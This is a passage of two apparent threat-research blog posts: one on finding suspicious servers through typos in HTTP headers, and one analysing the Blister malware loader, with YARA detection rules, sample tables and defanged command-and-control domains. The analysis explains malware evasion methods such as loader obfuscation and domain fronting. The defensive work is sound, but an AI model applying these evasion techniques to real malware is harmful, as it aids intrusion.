We sampled approximately 800,000 HTTP responses from public Censys scan data5. We also created a list of common HTTP response header fields, such as ‘Cache-Control’, ‘Expires’, ‘Content-Type’, and a list of typical server values, such as ‘Apache’, ‘Microsoft-IIS’, and ‘Nginx.’ We included a few common status codes like ‘200 OK,’ ensuring that the list contained commonly occurring words in HTTP responses to serve as our reference.

Metric: The Levenshtein distance
To measure typos, we used the Levenshtein distance, an intuitive spelling-checking model that measures the difference between two strings. The distance is calculated by counting the number of operations required to transform one string into the other. These operations can include insertions, deletions, and substitutions of characters. For example, when comparing the words ‘Cat’ and ‘Chat’ using the Levenshtein distance, we would observe that only one operation is needed to transform the word ‘Cat’ into ‘Chat’ (i.e., adding an ‘h’). Therefore, ‘Chat’ has a Levenshtein distance of one compared to ‘Cat’. However, comparing the words ‘Hats’ and ‘Cat’ would require two operations (i.e., changing ‘H’ to ‘C’ and adding an ‘s’ in the end), and therefore, ‘Hats’ would have a Levenshtein distance of two compared to ‘Cat.’

The Levenshtein distance can be made sensitive to capitalization and any character, allowing for the detection of unusual additional spaces or lowercase characters, for example. This measure can be useful for identifying small differences in text, such as those that may be introduced by typos or other anomalies in HTTP response headers. While HTTP header keys are case-insensitive by specification, our model has been adjusted to consider any character variation. Specifically, we have made the ‘Server’ header case-sensitive to catch all nuances of the server’s identity and possible anomalies.

Our model performs a comparative analysis between our predefined list (of commonly occurring HTTP response headers and server values) and the words in the HTTP responses. It is designed to return words that are nearly identical to those of the list but includes small deviations. For instance, it can detect slight deviations such as ‘Content-Tyle’ instead of the correct ‘Content-Type’.

Output: A list with anomalous HTTP responses
The model returned a list of two hundred anomalous HTTP responses from our batch of HTTP responses. We decided to check the frequency of these anomalies over the entire scan dataset, rather than the initial sample of 800.000 HTTP Responses. Our aim was to get more context regarding the prevalence of these spelling errors.

We found that some of these anomalies were relatively common among HTTP response headers. For example, we discovered more than eight thousand instances of the HTTP response header ‘Expired’ instead of ‘Expires.’ Additionally, we saw almost three thousand instances of server names that deviated from the typical naming convention of ‘Apache’ as can be seen in table 1.

DeviationCommon NameAmount
Server: Apache CoyoteServer: Apache-Coyote2941
Server: Apache \r\nServer: Apache2952
Server: Apache.Server: Apache3047
Server: CloudFlareServer: Cloudflare6615
Expired:Expires:8260
Table 1: Frequency of deviations in HTTP responses online 

Refining our research: Delving into the rarest anomalies
However, the rarest anomalies piqued our interest, as they could potentially indicate new or unknown malicious servers. We narrowed our investigation by only analyzing HTTP responses that appeared less than two hundred times in the wild and cross-referenced them with our own telemetry. By doing this, we could obtain more context from surrounding traffic to investigate potential nefarious activities. In the following section, we will focus on the most interesting typos that stood out and investigate them based on our telemetry.

Findings

Anomalous server values
During our investigation, we came across several HTTP responses that displayed deviations from the typical naming conventions of the values of the ‘Server’ header.

For instance, we encountered an HTTP response header where the ‘Server’ value was written differently than the typical ‘Microsoft-IIS’ servers. In this case, the header read ‘Microsoft -IIS’ instead of ‘Microsoft-IIS’ (again, note the space) as shown in example 3. We suspected that this deviation was an attempt to make it appear like a ‘Microsoft-IIS’ server response. However, our investigation revealed that a legitimate company was behind the server which did not immediately indicate any nefarious activity. Therefore, even though the typo in the server’s name was suspicious, it did not turn out to come from a malicious server.

Example 4: HTTP response with ‘Microsoft -IIS’ server value

The ‘ngengx’ server value appeared to intentionally mimic the common server name ‘nginx’ (see example 4). We found that it was linked to a cable setup account from an individual that subscribed to a big telecom and hosting provider in The Netherlands. This deviation from typical naming conventions was strange, but we could not find anything suspicious in this case.

Example 5: HTTP response with a ‘ngengx’ server value

Similarly, the ‘Apache64’ server value deviates from the standard ‘Apache’ server value (see example 5). We found that this HTTP response was associated with webservers of a game developer, and no apparent malevolent activities were detected.

Example 6: HTTP response with an ‘Apache64’ server value

While these deviations from standard naming conventions could potentially indicate an attempt to disguise a malicious server, it does not always indicate nefarious activity.

Anomalous response headers
Moreover, we encountered HTTP response headers that deviated from the standard naming conventions. The ‘Content-Tyle’ header deviated from the standard ‘Content-Type’ header, and we found both the correct and incorrect spellings within the HTTP response (see example 6). We discovered that these responses originated from ‘imgproxy,’ a service designed for image resizing. This service appears to be legitimate. Moreover, a review of the source code confirms that the ‘Content-Tyle’ header is indeed hardcoded in the landing page source code (see Example 7).

Example 7: HTTP response with a ‘Content-Tyle’ header
Example 8: Screenshot of the landing page source code of imgproxy

Similarly, the ‘CONTENT_LENGTH’ header deviated from the standard spelling of ‘Content-Length’ (see example 7). However, upon further investigation, we found that the server behind this response also belongs to a server associated with webservers of a game developer. Again, we did not detect any malicious activities associated with this deviation from typical naming conventions.

Example 9: HTTP response with a ‘CONTENT_LENGTH’ header

The findings of our research seem to reveal that even HTTP responses set up by legitimate companies include messy and incorrect response headers.

Concluding Insights

Our study was designed to uncover potentially malicious servers by proactively searching for spelling mistakes in HTTP response headers. HTTP servers are generally expected to adhere to the established RFC guidelines, producing consistent HTTP responses as dictated by the standard protocols. Sometimes cybercriminals hosting malicious servers attempt to evade detection by imitating standard responses of legitimate software. However, sometimes they slip up, leaving inadvertent typos, which can be used for fingerprinting purposes.

Our study reveals that typos in HTTP responses are not as rare as one might assume. Despite the crucial role that appropriate implementation of HTTP response headers plays in the security and safety of websites and web services, our research suggests that textual errors in HTTP responses are surprisingly widespread, even in the outputs of servers from legitimate organizations. Although these deviations from standard naming conventions could potentially indicate an attempt to disguise a malicious server, they do not always signify nefarious activity. The internet is simply too messy.

Our research concludes that typos alone are insufficient to identify malicious servers. Nevertheless, they retain potential as part of a broader detection framework. We propose advancing this research by combining the presence of typos with additional metrics. One approach involves establishing a baseline of common anomalous HTTP responses, and then flagging HTTP responses with new typos as they emerge.

Furthermore, more research could be conducted regarding the order of HTTP headers. If the header order in the output differs from what is expected from a particular software, in combination with (new) typos, it may signal an attempt to mimic that software.

Lastly, this strategy could be integrated with other modelling approaches, such as data science models in Security Operations Centers. For instance, monitoring servers that are not only new to the network but also exhibit spelling errors. By integrating these efforts, we strive to enhance our ability to detect emerging malicious servers.

References

  1. https://blog.fox-it.com/2019/02/26/identifying-cobalt-strike-team-servers-in-the-wild/ ↩
  2. https://www.rfc-editor.org/rfc/rfc7231 ↩
  3. https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Headers_Cheat_Sheet.html ↩
  4. https://owasp.org/www-project-secure-headers/ ↩
  5. https://search.censys.io/ ↩

Popping Blisters for research: An overview of past payloads and exploring recent developments

Authored by Mick Koomen

Summary

Blister is a piece of malware that loads a payload embedded inside it. We provide an overview of payloads dropped by the Blister loader based on 137 unpacked samples from the past one and a half years and take a look at recent activity of Blister. The overview shows that since its support for environmental keying, most samples have this feature enabled, indicating that attackers mostly use Blister in a targeted manner. Furthermore, there has been a shift in payload type from Cobalt Strike to Mythic agents, matching with previous reporting. Blister drops the same type of Mythic agent which we thus far cannot link to any public Mythic agents. Another development is that its developers started obfuscating the first stage of Blister, making it more evasive. We provide YARA rules and scripts1 to help analyze the Mythic agent and the packer we observed with it.

Recap of Blister

Blister is a loader that loads a payload embedded inside it and in the past was observed with activity linked to Evil Corp2,3. Matching with public reporting, we have also seen it as a follow-up in SocGholish infections. In the past, we observed Blister mostly dropping Cobalt Strike beacons, yet current developments show a shift to Mythic agents, another red teaming framework.

Elastic Security first documented Blister in December 2021 in a campaign that used malicious installers4. It used valid code signatures referencing the company Blist LLC to pose as a legitimate executable, likely leading to the name Blister. That campaign reportedly dropped Cobalt Strike and BitRat.

In 2022, Blister started solely using the x86-64 instruction set, versus including 32-bit as well. Furthermore, RedCanary wrote observing SocGholish dropping Blister5, which was later confirmed by other vendors as well6.

In August the same year, we observed a new version of Blister. This update included more configuration options, along with an optional domain hash for environmental keying, allowing attackers to deploy Blister in a targeted manner. Elastic Security recently wrote about this version7.

2023 initially did not bring new developments for Blister. However, similar to its previous update, we observed development activity in August. Notably, we saw samples with added obfuscation to the first stage of Blister, i.e. the loader component that is injected into a legitimate executable. Additionally, in July, Unit 428 observed SocGholish dropping Blister with a Mythic agent.

In summary, 2023 brought new developments for Blister, with added obfuscations to the first stage and a new type of payload. The next part of this blog is divided into two parts: firstly, we look back at previous Blister payloads and configurations, and in the second part, we discuss the recent developments.

Looking back at Blister

In early 2023, we observed a SocGholish infection at our security operations center (SOC). We notified the customer and were given a binary that was related to the infection. This turned out to be a Blister sample, with Cobalt Strike as its payload.

We wrote an extractor that worked on the sample encountered at the SOC, but for certain other Blister samples it did not. It turned out that the sample from the SOC investigation belonged to a version of Blister that was introduced in August, 2022, while older samples had a different configuration. After writing an extractor for these older versions, we made an overview of what Blister had been dropping in roughly the past two years.

The samples we analyzed are all available on VirusTotal, the platform we used to find samples. We focus on 64-bit Blister samples, newer samples are not using 32-bit anymore, as far as we know. In total, we found 137 samples we could unpack, 33 samples with the older version and 104 samples with the newer version from 2022.

In the Appendix, we list these samples, where version 1 and 2 refer to the old and new version respectively. The table is sorted on the first seen date of a sample in VirusTotal, where you clearly see the introduction of the update.

Because we want to keep the tables comprehensible, we have split up the data into four tables. For now, it is important to note that Table 2 provides information per Blister sample we unpacked, including the date it was first uploaded to VirusTotal, the version, the label of the payload it drops, the type of payload, and two configuration flags. Furthermore, to have a list of Blister and payload hashes in clear text in the blog, we included these in Table 6. We also included a more complete data set at https://github.com/fox-it/blister-research.

Discussing payloads

Looking at the dropped payloads, we see that it mostly conforms with what has already been reported. In Figure 1, we provide a timeline based on the first seen date of a sample in VirusTotal and the family of the payload. The observed payloads consist of Cobalt Strike, Mythic, Putty, and a test application. Initially, Blister dropped various flavors of Cobalt Strike and later dropped a Mythic agent, which we refer to as BlisterMythic. Recently, we also observed a packer that unpacks BlisterMythic, which we refer to as MythicPacker. Interestingly, we did not observe any samples drop BitRat.

Figure 1, Overview of Blister samples we were able to unpack, based on the first seen date reported in VirusTotal.

From the 137 samples, we were able to retrieve 74 unique payloads. This discrepancy in amount of unique Blister samples versus unique payloads is mainly caused by various Blister samples that drop the same Putty or test application, namely 18 and 22 samples, respectively. This summer has shown a particular increase in test payloads.

Cobalt Strike

Cobalt Strike was dropped through three different types of payloads, generic shellcode, DLL stagers, or obfuscated shellcode. In total, we retrieved 61 beacons, in Table 1 we list the Cobalt Strike watermarks we observed. Watermarks are a unique value linked to a license key. It should be noted that Cobalt Strike watermarks can be changed and hence are not a sound way to identify clusters of activity.

Watermark (decimal)Watermark (hexadecimal)Nr. of beacons
2065460020xc4fa4522
15801038240x5e2e789021
11019917750x41af0f5f38
Table 1, Counted Cobalt Strike watermarks observed in beacons dropped by Blister.

The watermark 206546002, though only used twice, shows up in other reports as well, e.g. a report on an Emotet intrusion9 and a report linking it to Royal, Quantum, and Play ransomware activity10,11. The watermark 1580103824 is mentioned in reports on Gootloader12, but also Cl0p13 and also is the 9th most common beacon watermark, based on our dataset of Cobalt Strike beacons14. Interestingly, 1101991775, the watermark that is most common, is not mentioned in public reporting as far as we can tell.

Cobalt Strike profile generators

In Table 3, we list information on the extracted beacons. In there, we also list the submission path. Most of the submission paths contain /safebrowsing/ and /rest/2/meetings, matching with paths found in SourcePoint15, a Cobalt Strike command-and-control (C2) profile generator. This is only, however, for the regular shellcode beacons, when we look at the obfuscated shellcode and the DLL stager beacons, it seems to use a different C2 profile. The C2 profiles for these payloads match with another public C2 profile generator16.

Domain fronting

Some of the beacons are configured to use “domain fronting”, which is a technique that allows malicious actors to hide the true destination of their network traffic and evade detection by security systems. It involves routing malicious traffic through a content delivery network (CDN) or other intermediary server, making it appear as if the traffic is going to a legitimate or benign domain, while in reality, it’s communicating with a malicious C2 server.

Certain beacons have subdomains of fastly[.]net as their C2 server, e.g. backend.int.global.prod.fastly[.]net or python.docs.global.prod.fastly[.]net. However, the domains they connect to are admin.reddit[.]com or admin.wikihow[.]com, which are legitimate domains hosted on a CDN.

Obfuscated shellcode

In five cases, we observed Blister drop Cobalt Strike by first loading obfuscated shellcode. We included a YARA rule for this particular shellcode in the Appendix.

Performing a retrohunt on VirusTotal yielded only 12 samples, with names indicating potential test files and at least one sample dropping Cobalt Strike. We are unsure whether this is an obfuscator solely used by Evil Corp or whether it is used by other threat actors as well.

Figure 2, Layout of particular shellcode, with denoted steps.

The shellcode is fairly simple, we provide an overview of it in Figure 2. The entrypoint is at the start of the buffer, which calls into the decoding stub. This call instruction automatically pushes the next instruction’s address on the stack, which the decoding stub uses as a starting point to start mutating memory. Figure 3 shows some of these instructions, which are quite distinctive.

Figure 3, Decoding instructions observed in particular shellcode.

At the end of the decoding stub, it either jumps or calls back and then invokes the decryption function. This decryption function uses RC4, but the S-Box is already initialized, thus no key-scheduling algorithm is implemented. Lastly, it jumps to the final payload.

BlisterMythic

Matching with what was already reported by Unit 428, Blister recently started using Mythic agents as its payload. Mythic is one of the many red teaming frameworks on GitHub18. You can use various agents, which are listed on GitHub as well19 and can roughly be compared to a Cobalt Strike beacon. It is possible to write your own Mythic agent, as long as you comply with a set of constraints. Thus far, we keep seeing the same Mythic agent, which we discuss in more detail later on. The first sample dropping Mythic agents was uploaded to VirusTotal on July 24th 2023, just days before initial reportings of SocGholish infections leading to Mythic. In Table 4, we provide the C2 information from the observed Mythic agents.

We observed Mythic either as a Portable Executable (PE) or as shellcode. The shellcode seems to be rare and unpacks a PE file which thus far always resulted in a Mythic agent, in our experience. We discuss this packer later on as well and provide scripts that help with retrieving the PE file it packs. We refer to this specific Mythic agent as BlisterMythic and to the packer as MythicPacker.

In Table 5, we list the BlisterMythic C2 servers we were able to find. Interestingly, the domains were all registered at DNSPod. We also observed this in the past with Cobalt Strike domains we linked to Evil Corp. Apart from this, we also see similarities in the domain names used, e.g. domains consisting of two or three words concatenated to each other and using com as top-level domain (TLD).

Test payloads

Besides red team tooling like Mythic and Cobalt Strike, we also observed Putty and a test application as payloads. Running Putty through Blister does not seem logical and is likely linked to testing. It would only result in Putty not touching the disk and running in memory, which in itself is not useful. Additionally, when we look at the domain hashes in the Blister samples, only the Putty and test application samples in some cases share their domain hash.

Blister configurations

We also looked at the configurations of Blister, from this we can to some extent derive how it is used by attackers. Note that the collection also contains “test samples” from the attacker. Except for the more obvious Putty and test application, some samples that dropped Mythic, for instance, could also be linked to testing. We chose to leave out samples that drop Putty or the test application, leaving 97 samples in total. This means that the samples paint a partly biased picture, though we think it is still valuable and provides a view into how Blister is used.

Environmental keying

Since its update in 2022, Blister includes an optional domain hash, that it computes over the DNS search domain of the machine (ComputerNameDnsDomain). It only continues executing if the hash matches with its configuration, enabling environmental keying.

By looking at the amount of samples that have domain hash verification enabled, we can say something about how Blister is deployed. From the 66 Blister samples, only 6 samples did not have domain hash verification enabled. This indicates it is mostly used in a targeted manner, corresponding with using SocGholish for initial access and reconnaissance and then deploying Blister, for example.

Persistence

Of the 97 samples, 70 have persistence enabled. For persistence, Blister still uses the same method as described by Elastic Security20. It mostly uses IFileOperation COM interface to copy rundll32.exe and itself to the Startup folder, this is significant for detection, as it means that these operations are done by the process DllHost.exe, not the rundll32.exe process that hosts Blister.

Blister trying new things

Blister’s previous update altered the core payload, however, the loader that is injected into the legitimate executable remained unchanged. In August this year, we observed experimental samples on VirusTotal with an obfuscated loader component, hinting at developer activity. Interestingly, we could link these samples to another sample on VirusTotal which solely contained the function body of the loader and another sample that contained a loader with a large set of INT 3 instructions added to it. Perhaps the developer was experimenting with different mutations to see how it influences the detection rate.

Obfuscating the first stage

Recent samples from September 2023 have the loader obfuscated in the same manner, with bogus instructions and excessive jump instructions. These changes make it harder to detect Blister using YARA, as the loader instructions are now intertwined with junk instructions and sometimes are followed by junk data due to the added jump instructions.

Figure 4, Comparison of two loader components from recent Blister samples, left is without obfuscation and right is with obfuscation.

In Figure 4, we compare the two function bodies of the loader, one body which is normally seen in Blister samples and one obfuscated function body, observed in the recent samples. The comparison shows that naive YARA rules are less likely to trigger on the obfuscated function body. In the Appendix, we provide a Blister rule that tries to detect these obfuscated samples. The added bogus instructions include instructions, such as btc, bts, lahf and cqo, bogus instructions we also observed in the Blister core before, see the core component of SHA256 4faf362b3fe403975938e27195959871523689d0bf7fba757ddfa7d00d437fd4, for example.

Dropping Mythic agents

Apart from an obfuscated loader, Mythic agents currently are the payload of choice. In September and October, we found obfuscated Blister samples only dropping Mythic. Certain samples have low or zero detections on VirusTotal21 at the time of writing, showing that obfuscation does pay off.

We now discuss one sample22 that drops a shellcode eventually executing a Mythic agent. The shellcode unpacks a PE file and executes it. We provide a YARA rule for this packer in the Appendix, which we refer to as MythicPacker. Based on this rule, we did not find other samples, suggesting it is a custom packer. Until now, we have only seen this packer unpacking Mythic agents.

The dropped Mythic agents are all similar and we cannot link them to any public agents thus far. This could mean that Blister developers created their own Mythic agent, though this is uncertain. We provided a YARA rule that matches on all agents we encountered, a VirusTotal retrohunt over the past year resulted in only four samples, all linked to Blister. We think this Mythic agent is likely custom-made.

Figure 5, BlisterMythic configuration decryption.

The agents all share a similar structure, namely an encrypted configuration in the .bss section of the executable. The agent has an encrypted configuration which is decrypted by XORing the size of the configuration with a constant that differs per sample, it seems. For PE files, we have a Python script that can decrypt a configuration. Figure 5 denotes this decryption loop, where the XOR constant is 0x48E12000.

Figure 6, Decrypted BlisterMythic configuration

Dumping the configuration results in a binary blob that contains various information, including the C2 server. Figure 6 shows a hexdump of a snippet from the decrypted configuration. We created a script to dump the decrypted configuration of the BlisterMythic agent in PE format and also a script that unpacks MythicPacker shellcode and outputs a reconstructed PE file, see https://github.com/fox-it/blister-research.

Conclusion

In this post, we provided an overview of observed Blister payloads from the past one and a half years on VirusTotal and also gave insight into recent developments. Furthermore, we provided scripts and YARA rules to help analyze Blister and the Mythic agent it drops.

From the analyzed payloads, we see that Cobalt Strike was the favored choice, but that lately this has been replaced by Mythic. Cobalt Strike was mostly dropped as shellcode and briefly run through obfuscated shellcode or a DLL stager. Apart from Cobalt Strike and Mythic, we saw that Blister test samples are uploaded to VirusTotal as well.

The custom Mythic agent together with the obfuscated loader, are new Blister developments that happened in the past months. It is likely that its developers were aware that the loader component was still a weak spot in terms of static detection. Additionally, throughout the years, Cobalt Strike has received a lot of attention from the security community, with available dumpers and C2 feeds readily available. Mythic is not as popular and allows you to write your own agent, making it an appropriate replacement for now.

References

  1. https://github.com/fox-it/blister-research ↩
  2. https://www.mandiant.com/resources/blog/unc2165-shifts-to-evade-sanctions ↩
  3. https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/ ↩
  4. https://www.elastic.co/security-labs/elastic-security-uncovers-blister-malware-campaign ↩
  5. https://redcanary.com/blog/intelligence-insights-january-2022/ ↩
  6. https://www.trendmicro.com/en_ie/research/22/d/Thwarting-Loaders-From-SocGholish-to-BLISTERs-LockBit-Payload.html ↩
  7. https://www.elastic.co/security-labs/revisiting-blister-new-developments-of-the-blister-loader ↩
  8. https://twitter.com/Unit42_Intel/status/1684583246032506880 ↩
  9. https://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/ ↩
  10. https://www.group-ib.com/blog/shadowsyndicate-raas/ ↩
  11. https://www.trendmicro.com/en_us/research/22/i/play-ransomware-s-attack-playbook-unmasks-it-as-another-hive-aff.html ↩
  12. https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/ ↩
  13. https://redcanary.com/wp-content/uploads/2022/05/Gootloader.pdf ↩
  14. https://research.nccgroup.com/2022/03/25/mining-data-from-cobalt-strike-beacons/ ↩
  15. https://github.com/Tylous/SourcePoint ↩
  16. https://github.com/threatexpress/random_c2_profile ↩
  17. https://twitter.com/Unit42_Intel/status/1684583246032506880 ↩
  18. https://github.com/its-a-feature/Mythic ↩
  19. https://mythicmeta.github.io/overview/ ↩
  20. https://www.elastic.co/security-labs/blister-loader ↩
  21. https://www.virustotal.com/gui/file/a5fc8d9f9f4098e2cecb3afc66d8158b032ce81e0be614d216c9deaf20e888ac ↩
  22. https://www.virustotal.com/gui/file/f58de1733e819ea38bce21b60bb7c867e06edb8d4fd987ab09ecdbf7f6a319b9 ↩

Appendix

YARA rules

rule shellcode_obfuscator
{
    meta:
        os = "Windows"
        arch = "x86-64"
        description = "Detects shellcode packed with unknown obfuscator observed in Blister samples."
        reference_sample = "178ffbdd0876b99ad1c2d2097d9cf776eca56b540a36c8826b400cd9d5514566"
    strings:
        $rol_ror = { 48 C1 ?? ?? ?? 48 C1 ?? ?? ?? 48 C1 ?? ?? ?? }
        $mov_rol_mov = { 4d ?? ?? ?? 49 c1 ?? ?? ?? 4d ?? ?? ?? }
        $jmp = { 49 81 ?? ?? ?? ?? ?? 41 ?? }
    condition:
        #rol_ror > 60 and $jmp and filesize < 2MB and #mov_rol_mov > 60
}

import "pe"
import "math"

rule blister_x64_windows_loader {
    meta:
        os = "Windows"
        arch = "x86-64"
        family = "Blister"
        description = "Detects Blister loader component injected into legitimate executables."
        reference_sample = "343728792ed1e40173f1e9c5f3af894feacd470a9cdc72e4f62c0dc9cbf63fc1, 8d53dc0857fa634414f84ad06d18092dedeb110689a08426f08cb1894c2212d4, a5fc8d9f9f4098e2cecb3afc66d8158b032ce81e0be614d216c9deaf20e888ac"
    strings:
        // 65 48 8B 04 25 60 00 00 00                          mov     rax, gs:60h
        $inst_1 = {65 48 8B 04 25 60 00 00 00}
        // 48 8D 87 44 6D 00 00                                lea     rax, [rdi+6D44h]
        $inst_2 = {48 8D 87 44 6D 00 00}
        // 44 69 C8 95 E9 D1 5B                                imul    r9d, eax, 5BD1E995h
        $inst_3 = {44 ?? ?? 95 E9 D1 5B}
        // 41 81 F9 94 85 09 64                                cmp     r9d, 64098594h
        $inst_4 = {41 ?? ?? 94 85 09 64}
        // B8 FF FF FF 7F                                      mov     eax, 7FFFFFFFh
        $inst_5 = {B8 FF FF FF 7F}
        // 48 8D 4D 48                                         lea     rcx, [rbp+48h]
        $inst_6 = {48 8D 4D 48}
    condition:
        uint16(0) == 0x5A4D and
        all of ($inst_*) and
        pe.number_of_resources > 0 and
        for any i in (0..pe.number_of_resources - 1):
            ( (math.entropy(pe.resources[i].offset, pe.resources[i].length) > 6) and
                pe.resources[i].length > 200000 
            )
}

rule blister_mythic_payload {
    meta:
        os = "Windows"
        arch = "x86-64"
        family = "BlisterMythic"
        description = "Detects specific Mythic agent dropped by Blister."
        reference_samples = "2fd38f6329b9b2c5e0379a445e81ece43fe0372dec260c1a17eefba6df9ffd55, 3d2499e5c9b46f1f144cfbbd4a2c8ca50a3c109496a936550cbb463edf08cd79, ab7cab5192f0bef148670338136b0d3affe8ae0845e0590228929aef70cb9b8b, f89cfbc1d984d01c57dd1c3e8c92c7debc2beb5a2a43c1df028269a843525a38"
    strings:
        $start_inst = { 48 83 EC 28 B? [4-8] E8 ?? ?? 00 00 }
        $for_inst = { 48 2B C8 0F 1F 00 C6 04 01 00 48 2D 00 10 00 00 }
    condition:
        all of them
}

rule mythic_packer
{
    meta:
        os = "Windows"
        arch = "x86-64"
        family = "MythicPacker"
        description = "Detects specific PE packer dropped by Blister."
        reference_samples = "9a08d2db7d0bd7d4251533551d4def0f5ee52e67dff13a2924191c8258573024, 759ac6e54801e7171de39e637b9bb525198057c51c1634b09450b64e8ef47255"
    strings:
        // 41 81 38 72 47 65 74        cmp     dword ptr [r8], 74654772h
        $a = { 41 ?? ?? 72 47 65 74 }
        // 41 81 38 72 4C 6F 61        cmp     dword ptr [r8], 616F4C72h
        $b = { 41 ?? ?? 72 4C 6F 61 }
        // B8 01 00 00 00              mov     eax, 1
        // C3                          retn
        $c = { B8 01 00 00 00 C3 }
    condition:
        all of them and uint8(0) == 0x48
}

Blister payloads listing

First seenVersionPayload familyPayload typeEnvironmental keyingPersistence
2021-12-031Cobalt StrikeshellcodeN/a0
2021-12-051Cobalt StrikeshellcodeN/a0
2021-12-141Cobalt StrikeshellcodeN/a0
2022-01-101Cobalt StrikeshellcodeN/a1
2022-01-111Cobalt StrikeshellcodeN/a1
2022-01-191Cobalt StrikeshellcodeN/a1
2022-01-191Cobalt StrikeshellcodeN/a1
2022-01-311Cobalt StrikeshellcodeN/a1
2022-02-141Cobalt StrikeshellcodeN/a1
2022-02-171Cobalt StrikeshellcodeN/a1
2022-02-221Cobalt StrikeshellcodeN/a1
2022-02-261Cobalt StrikeshellcodeN/a1
2022-03-101Cobalt StrikeshellcodeN/a1
2022-03-141Cobalt StrikeshellcodeN/a1
2022-03-151Cobalt StrikeshellcodeN/a0
2022-03-151Cobalt StrikeshellcodeN/a0
2022-03-181Cobalt StrikeshellcodeN/a0
2022-03-181Cobalt StrikeshellcodeN/a1
2022-03-241PuttyexeN/a0
2022-03-241PuttyexeN/a0
2022-03-301Cobalt StrikeshellcodeN/a1
2022-04-011Cobalt StrikeshellcodeN/a0
2022-04-111Cobalt StrikeshellcodeN/a1
2022-04-221Cobalt StrikeshellcodeN/a1
2022-04-251Cobalt StrikeshellcodeN/a0
2022-06-011Cobalt StrikeshellcodeN/a0
2022-06-021Cobalt StrikeshellcodeN/a1
2022-06-141Cobalt StrikeshellcodeN/a1
2022-07-041Cobalt StrikeshellcodeN/a1
2022-07-191Cobalt StrikeshellcodeN/a0
2022-07-211Cobalt StrikeshellcodeN/a0
2022-08-051Cobalt StrikeshellcodeN/a1
2022-08-292Cobalt Strikeshellcode01
2022-09-022Cobalt Strikeshellcode00
2022-09-292Cobalt Strikeshellcode10
2022-10-182Cobalt Strikeshellcode11
2022-10-182Cobalt Strikeshellcode11
2022-10-182Cobalt Strikeshellcode10
2022-10-182Cobalt Strikeshellcode11
2022-10-212Cobalt Strikeshellcode11
2022-10-212Cobalt Strikeshellcode10
2022-10-242Cobalt Strikeshellcode11
2022-10-262Cobalt Strikeshellcode11
2022-10-262Cobalt Strikeshellcode11
2022-10-282Cobalt Strikeshellcode10
2022-10-312Cobalt Strikeshellcode11
2022-11-022Cobalt Strikeshellcode11
2022-11-032Cobalt Strikeshellcode11
2022-11-072Cobalt Strikeshellcode11
2022-11-082Cobalt Strikeshellcode11
2022-11-172Cobalt Strikeshellcode11
2022-11-222Cobalt Strikeshellcode11
2022-11-302Cobalt Strikeshellcode11
2022-12-012Cobalt Strikeshellcode11
2022-12-012Cobalt Strikeshellcode10
2022-12-012Cobalt Strikeshellcode10
2022-12-022Cobalt Strikeshellcode11
2022-12-052Cobalt Strikeshellcode11
2022-12-122Cobalt Strikeshellcode11
2022-12-132Cobalt Strikeshellcode11
2022-12-232Cobalt Strikeshellcode11
2023-01-062Cobalt Strikeshellcode11
2023-01-162Cobalt Strike obfuscated shellcodeshellcode11
2023-01-162Cobalt Strike obfuscated shellcodeshellcode11
2023-01-162Cobalt Strike obfuscated shellcodeshellcode11
2023-01-172Cobalt Strikeshellcode01
2023-01-172Cobalt Strike obfuscated shellcodeshellcode11
2023-01-202Cobalt Strike obfuscated shellcodeshellcode11
2023-01-202Cobalt Strike obfuscated shellcodeshellcode11
2023-01-242Cobalt Strikeshellcode11
2023-01-262Cobalt Strikeshellcode11
2023-01-262Cobalt Strikeshellcode11
2023-02-022Cobalt Strikeshellcode11
2023-02-022Test applicationshellcode10
2023-02-022Test applicationshellcode10
2023-02-022Puttyexe10
2023-02-022Test applicationshellcode10
2023-02-152Puttyexe10
2023-02-152Test applicationshellcode10
2023-02-152Puttyexe10
2023-02-152Test applicationshellcode10
2023-02-172Cobalt Strike stagerexe11
2023-02-272Cobalt Strike stagerexe11
2023-02-282Cobalt Strike stagerexe11
2023-03-062Cobalt Strike stagerexe11
2023-03-062Cobalt Strike stagerexe11
2023-03-062Cobalt Strike stagerexe11
2023-03-152Cobalt Strike stagerexe10
2023-03-192Cobalt Strike stagerexe11
2023-03-231Cobalt StrikeshellcodeN/a1
2023-03-282Cobalt Strike stagerexe11
2023-03-282Cobalt Strike stagerexe10
2023-04-032Cobalt Strike stagerexe11
2023-05-252Cobalt Strike stagerexe01
2023-05-262Cobalt Strikeshellcode11
2023-06-112Test applicationshellcode10
2023-06-112Puttyexe10
2023-06-112Puttyexe10
2023-07-242BlisterMythicexe11
2023-07-272BlisterMythicexe11
2023-08-092Test applicationshellcode10
2023-08-092Test applicationshellcode10
2023-08-092Test applicationshellcode10
2023-08-092Test applicationshellcode10
2023-08-092Test applicationshellcode10
2023-08-092Test applicationshellcode10
2023-08-092Test applicationshellcode10
2023-08-092Test applicationshellcode10
2023-08-092Test applicationshellcode10
2023-08-092Test applicationshellcode10
2023-08-092Test applicationshellcode10
2023-08-102Puttyshellcode10
2023-08-102Puttyshellcode10
2023-08-102Puttyshellcode10
2023-08-102Puttyshellcode10
2023-08-102Puttyshellcode10
2023-08-102Puttyshellcode10
2023-08-102Puttyshellcode10
2023-08-102Puttyshellcode10
2023-08-102Puttyshellcode10
2023-08-112BlisterMythicexe10
2023-08-152Test applicationshellcode10
2023-08-172BlisterMythicexe11
2023-08-182MythicPackershellcode10
2023-09-052MythicPackershellcode00
2023-09-052MythicPackershellcode01
2023-09-082Test applicationshellcode10
2023-09-082Test applicationshellcode10
2023-09-082Test applicationshellcode10
2023-09-082Puttyshellcode10
2023-09-082Puttyshellcode10
2023-09-082Test applicationshellcode10
2023-09-192BlisterMythicexe11
2023-09-212MythicPackershellcode10
2023-09-212MythicPackershellcode10
2023-10-032MythicPackershellcode10
2023-10-102MythicPackershellcode10
Table 2, Information on unpacked Blister samples.

Cobalt Strike beacons

WatermarkDomainURI
1101991775albertonne[.]com/safebrowsing/d4alBmGBO/HafYg4QZaRhMBwuLAjVmSPc
1101991775astradamus[.]com/Collect/union/QXMY8BHNIPH7
1101991775backend.int.global.prod.fastly[.]net/Detect/devs/NJYO2MUY4V
1101991775cclastnews[.]com/safebrowsing/d4alBmGBO/UaIzXMVGvV3tS2OJiKxSzyzbh4u1
1101991775cdp-chebe6efcxhvd0an.z01.azurefd[.]net/Detect/devs/NJYO2MUY4V
